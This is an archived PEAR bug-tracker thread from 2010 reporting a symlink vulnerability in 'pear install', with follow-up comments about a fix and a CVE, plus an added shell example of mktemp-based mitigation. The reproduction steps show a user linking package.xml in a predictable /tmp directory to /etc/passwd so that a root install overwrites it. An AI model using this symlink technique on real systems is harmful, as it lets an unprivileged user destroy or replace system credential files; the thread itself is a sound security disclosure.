Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

ID: 18056
Updated by: [email protected]
Reported By: ondrej at sury dot org
Summary: [SECURITY]: Symlink attack in PEAR install
Status: Open
Type: Bug
Package: PEAR
Operating System: Linux
Package Version: 1.9.1
PHP Version: 5.3.3
-Assigned To:
+Assigned To: dufuz
Roadmap Versions:
New Comment:

-Assigned To:
+Assigned To: dufuz



Previous Comments:
------------------------------------------------------------------------

[2010-11-14 15:29:11] ondrej

This should probably get a CVE.

It's already tracked under:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
http://security-tracker.debian.org/tracker/TEMP-0546164-014755

Bug first reported by Raphael Geisert (one of the Debian php5 maintainers).

Ondrej, on behalf of Debian PHP5 maintainers

------------------------------------------------------------------------

[2010-11-14 15:26:39] ondrej

Description:
------------
There's a symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for its directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exist.

Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir /tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
http://pear.php.net/dtd/package-2.0.xsd">
<name>Net_Socket</name>
<channel>pear.php.net</channel>
<summary>Network Socket Interface</summary>
<description>Net_Socket is a class interface to TCP sockets. It
provides blocking
and non-blocking operation, with different reading and writing modes
(byte-wise, block-wise, line-wise and special formats like network
byte-order ip addresses).</description>
<lead>


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating the right directories and
symlinks.

------------------------------------------------------------------------
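
The mitigation the report asks for (a mktemp-created directory plus an existence check before writing), as an added shell example. It is not PEAR's code or its fix; the function names and the pear-work prefix are assumptions made for illustration.

```shell
#!/bin/sh
# Added illustration, not PEAR code. All function names are hypothetical.

# Create a fresh, unpredictably named, owner-only work directory instead of
# reusing a fixed path such as /tmp/pear/temp. mktemp -d fails rather than
# adopting a directory that someone else created first.
make_private_workdir() {
    mpw_dir=$(mktemp -d "${TMPDIR:-/tmp}/pear-work.XXXXXXXXXX") || return 1
    chmod 700 "$mpw_dir" || return 1
    printf '%s\n' "$mpw_dir"
}

# Decide whether an already existing directory may be used: it must be a real
# directory (not a symlink), owned by the current user, not writable by group
# or others, and must not already contain symlinks.
dir_is_trustworthy() {
    [ -d "$1" ] && [ ! -L "$1" ] || return 1
    [ -n "$(find "$1" -prune -user "$(id -u)" -print)" ] || return 1
    [ -z "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ] || return 1
    [ -z "$(find "$1" -type l -print)" ]
}

# Write stdin to a path only if nothing exists there yet, symlinks included.
# noclobber (set -C) makes the shell create the file exclusively, so a link
# planted between the check and the write is not followed.
write_new_file() {
    if [ -L "$1" ] || [ -e "$1" ]; then
        echo "refusing to write, path already exists: $1" >&2
        return 1
    fi
    ( set -C; cat > "$1" ) 2>/dev/null
}
```

Applied to the test script above, dir_is_trustworthy rejects a download directory owned by another user or holding a planted package.xml link, and write_new_file refuses the link even if the directory check is skipped.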


  • Helgith at Dec 29, 2010 at 4:05 am
    Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

    ID: 18056
    Updated by: [email protected]
    Reported By: ondrej at sury dot org
    Summary: [SECURITY]: Symlink attack in PEAR install
    Status: Assigned
    Type: Bug
    Package: PEAR
    Operating System: Linux
    Package Version: 1.9.1
    PHP Version: 5.3.3
    Assigned To: dufuz
    Roadmap Versions:
    New Comment:

    A fix is coming soon, sorry for the delays. As for the CVE, is that
    something you (or any of the Debian people) want to take care of?


    Previous Comments:
    ------------------------------------------------------------------------

    [2010-12-08 01:35:29] dufuz

    -Assigned To:
    +Assigned To: dufuz


    ------------------------------------------------------------------------

  • Ondrej at Dec 29, 2010 at 12:20 pm
    Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1

    ID: 18056
    Updated by: [email protected]
    Reported By: ondrej at sury dot org
    Summary: [SECURITY]: Symlink attack in PEAR install
    Status: Assigned
    Type: Bug
    Package: PEAR
    Operating System: Linux
    Package Version: 1.9.1
    PHP Version: 5.3.3
    Assigned To: dufuz
    Roadmap Versions:
    New Comment:

    Hi, thanks for working on the fix.

    You should probably request a CVE, since you are the owner of the
    project. I guess you can ask on internals how to do that.

    Ondrej



Discussion Overview
group: pear-bugs @
categories: php
posted: Dec 8, '10 at 12:34a
active: Dec 29, '10 at 12:20p
posts: 3
users: 2
website: pear.php.net
